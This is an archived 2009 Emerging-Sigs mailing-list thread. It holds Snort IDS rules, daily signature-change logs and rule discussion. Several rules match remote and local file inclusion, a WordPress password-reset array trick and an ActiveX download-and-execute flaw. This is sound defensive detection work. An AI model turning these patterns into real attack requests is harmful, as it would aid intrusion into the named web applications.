url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-web_sql_injection.rules (2): #Seen being used for vuln scanning. 
# The original script it's modified from is legitimate, so there may be some falses
-> Removed from emerging.rules (1):
#broken, replaced with below rule

From cunningpike at gmail.com Wed Aug 12 17:02:13 2009
From: cunningpike at gmail.com (CunningPike)
Date: Wed, 12 Aug 2009 14:02:13 -0700
Subject: [Emerging-Sigs] Fwd: 175/8 and 182/8 allocated to APNIC

FYI.

CP

---------- Forwarded message ----------
From: Leo Vegoda
Date: Wed, Aug 12, 2009 at 9:02 AM
Subject: 175/8 and 182/8 allocated to APNIC
To: Leo Vegoda

Hi,

The IANA IPv4 registry has been updated to reflect the allocation of two /8 IPv4 blocks to APNIC in August 2009: 175/8 and 182/8. You can find the IANA IPv4 registry at:

http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.xml
http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt

Please update your filters as appropriate.

Regards,

Leo Vegoda
Number Resources Manager, IANA

From signatures at stillsecure.com Thu Aug 13 03:29:43 2009
From: signatures at stillsecure.com (signatures)
Date: Thu, 13 Aug 2009 01:29:43 -0600
Subject: [Emerging-Sigs] StillSecure: 10 New Signatures - Aug - 13 - 2009
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2938@webmail.latis.com>

Hi Matt,

Please find 10 New Signatures below:

1.
WEB-PHP Clickheat install.clickheat.php mosConfig_absolute_path Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat install.clickheat.php mosConfig_absolute_path Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/install.clickheat.php?"; nocase; uricontent:"GLOBALS[mosConfig_absolute_path]="; nocase; pcre:"/GLOBALS\[mosConfig_absolute_path\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7551; rev:1;)

2. WEB-PHP Clickheat _main.php mosConfig_absolute_path Parameter Remote File Inclusion - 1

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat _main.php mosConfig_absolute_path Parameter Remote File Inclusion - 1"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/heatmap/_main.php?"; nocase; uricontent:"mosConfig_absolute_path="; nocase; pcre:"/mosConfig_absolute_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7552; rev:1;)

3. WEB-PHP Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion - 2

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion - 2"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/heatmap/main.php?"; nocase; uricontent:"mosConfig_absolute_path="; nocase; pcre:"/mosConfig_absolute_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7553; rev:1;)

4.
WEB-PHP Clickheat Cache.php mosConfig_absolute_path Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat Cache.php mosConfig_absolute_path Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/Clickheat/Cache.php?"; nocase; uricontent:"GLOBALS[mosConfig_absolute_path]="; nocase; pcre:"/GLOBALS\[mosConfig_absolute_path\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7554; rev:1;)

5. WEB-PHP Clickheat Clickheat_Heatmap.php mosConfig_absolute_path Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat Clickheat_Heatmap.php mosConfig_absolute_path Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/Clickheat_Heatmap.php?"; nocase; uricontent:"GLOBALS[mosConfig_absolute_path]="; nocase; pcre:"/GLOBALS\[mosConfig_absolute_path\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7555; rev:1;)

6. WEB-PHP Clickheat GlobalVariables.php mosConfig_absolute_path Remote File Inclusion - 1

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat GlobalVariables.php mosConfig_absolute_path Remote File Inclusion - 1"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/GlobalVariables.php?"; nocase; uricontent:"GLOBALS[mosConfig_absolute_path]="; nocase; pcre:"/GLOBALS\[mosConfig_absolute_path\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7556; rev:1;)

7.
WEB-PHP Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion -2

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion -2"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/overview/main.php?"; nocase; uricontent:"mosConfig_absolute_path="; nocase; pcre:"/mosConfig_absolute_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7557; rev:1;)

8. WEB-PHP Cyberfolio css.php theme Parameter Local File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Cyberfolio css.php theme Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/portfolio/css.php?"; nocase; uricontent:"theme="; nocase; content:"../"; classtype:web-application-attack; reference:cve,CVE-2008-6265; reference:bugtraq,32218; reference:url,vupen.com/english/advisories/2008/3070; reference:url,milw0rm.com/exploits/7065; sid:7558; rev:1;)

9. WEB-PHP LWS php User Base unverified.inc.php template Parameter Local File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP LWS php User Base unverified.inc.php template Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/include/unverified.inc.php?"; nocase; uricontent:"template="; nocase; content:"../"; classtype:web-application-attack; reference:bugtraq,27964; reference:url,juniper.net/security/auto/vulnerabilities/vuln27964.html; reference:url,milw0rm.com/exploits/5179; sid:7559; rev:1;)

10.
WEB-ATTACKS EDraw PDF Viewer ActiveX Control Remote code execution

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS EDraw PDF Viewer ActiveX Control Remote code execution"; flow:to_client,established; content:"clsid"; nocase; content:"44A8091F-8F01-43B7-8CF7-4BBA71E61E04"; nocase; distance:0; pcre:"/(FtpConnect|FtpDownloadFile)/i"; classtype:web-application-attack; reference:url,secunia.com/advisories/35509/; reference:url,archives.neohapsis.com/archives/fulldisclosure/2009-06/0198.html; sid:7681; rev:1;)

Looking forward to your comments, if any....

Thanks & Regards,
StillSecure

From kevross33 at googlemail.com Thu Aug 13 09:27:00 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Thu, 13 Aug 2009 14:27:00 +0100
Subject: [Emerging-Sigs] some sigs
In-Reply-To: <4A8171A8.3010803@jonkmans.com>
References: <9d6a1ae60908110623v4c16d66fo2be8b4d3a4dd71a6@mail.gmail.com> <4A8171A8.3010803@jonkmans.com>

Nice :) And what about the XSS Sigs? Are they any good?

Kev

2009/8/11 Matt Jonkman

> Posted this way. Thanks.
>
> By the way, you both get a sig credit in the contest. One for writing
> and one for a significant modification.
>
> Matt
>
> Bojan Zdrnja (SANS ISC) wrote:
> > On Tue, Aug 11, 2009 at 2:32 PM, Kevin Ross wrote:
> >> Spelling Correction:
> >>
> >> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible
> >> Wordpress Administrative Password Reset Vulnerability";
> >> flow:to_server,established; uricontent:"/wp-login.php?action=rp&key=";
> >> nocase; classtype:web-application-attack;
> >> reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html;
> >> sid:1900006; rev:1;)
> >
> > If I'm not wrong, this will alert on legitimate password resets.
> > You want to catch it when key is an array (since that will pass the check
> > in Wordpress' PHP code. So, I think this rule would be correct:
> >
> > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
> > (msg:"Possible Wordpress Administrative Password Reset Vulnerability";
> > flow:to_server,established;
> > uricontent:"/wp-login.php?action=rp&key[]="; nocase;
> > classtype:web-application-attack;
> > reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html;
> > sid:1900006; rev:1;)
> >
> >
> > Cheers,
> >
> > Bojan
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Open Information Security Foundation (OISF)
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> http://www.openinformationsecurityfoundation.org
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc

From emerging at emergingthreats.net Thu Aug 13 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Thu, 13 Aug 2009 16:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090813200012.3DAEC4504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Thu Aug 13 16:00:12 2009 [***]

[*] Rules modifications: [*]
    None.
[---] Removed non-rule lines: [---]
-> Removed from emerging-sid-msg.map (64):
-> Removed from emerging-sid-msg.map.txt (64):
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (101) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (107) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From emerging at emergingthreats.net Fri Aug 14 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri, 14 Aug 2009 16:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090814200012.C91054504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Fri Aug 14 16:00:12 2009 [***]

[+++] Added rules: [+++]

2002849 - ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet (emerging-web_sql_injection.rules)

[///] Modified active rules: [///]

2001239 - ET POLICY Cisco Device in Config Mode (emerging-policy.rules)
2001240 - ET POLICY Cisco Device New Config Built (emerging-policy.rules)
2002801 - ET POLICY Google Desktop User-Agent Detected (emerging-policy.rules)
2002838 - ET POLICY Google Search Appliance browsing the Internet (emerging-policy.rules)
2003634 - ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan (emerging-scan.rules)
2009711 - ET TROJAN Win32.Runner (Often Rootkit) - POST (emerging-virus.rules)
2009712 - ET MALWARE Adware PlusDream - GET Config Download/Update (emerging-malware.rules)
2009713 - ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected (emerging.rules)
2009714 - ET WEB Script tag in URI, Possible Cross Site Scripting Attempt (emerging-web.rules)
2009715 - ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt (emerging-web.rules)
2009716 - ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection (emerging-web_sql_injection.rules)
2009717 - ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009718 - ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection (emerging-web_sql_injection.rules)
2009719 - ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion (emerging-web_sql_injection.rules)
2009720 - ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion (emerging-web_sql_injection.rules)
2009723 - ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009724 - ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009725 - ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow (emerging-web.rules)
2009726 - ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009727 - ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection (emerging-web_sql_injection.rules)
2009728 - ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009729 - ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009730 - ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection (emerging-web_sql_injection.rules)
2009731 - ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection (emerging-web_sql_injection.rules)
2009733 - ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009734 - ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection (emerging-web_sql_injection.rules)
2009735 - ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow (emerging-web.rules)
2009736 - ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal (emerging-web_sql_injection.rules)
2009737 - ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete (emerging-web_sql_injection.rules)
2009738 - ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection (emerging-web_sql_injection.rules)
2009739 - ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection (emerging-web_sql_injection.rules)
2009740 - ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection (emerging-web_sql_injection.rules)
2009741 - ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection (emerging-web_sql_injection.rules)
2009742 - ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection (emerging-web_sql_injection.rules)
2009743 - ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009744 - ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection (emerging-web_sql_injection.rules)
2009745 - ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009746 - ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009747 - ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection (emerging-web_sql_injection.rules)
2009748 - ET WEB Possible Wordpress Administrative Password Reset Vulnerability (emerging-web.rules)
2009749 - ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan (emerging-scan.rules)

[---] Removed rules: [---]

2002849 - ET POLICY Google Appliance External Proxy Stylesheet (emerging-policy.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (42):
2001239 || ET POLICY Cisco Device in Config Mode || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001239
2001240 || ET POLICY Cisco Device New Config Built || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001240
2002801 || ET POLICY Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html
2002838 || ET POLICY Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html
2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509
2003634 || ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Get-minimal_UA || url,doc.emergingthreats.net/2003634
2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Runner || url,doc.emergingthreats.net/2009711 || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html
2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_PlusDream ||
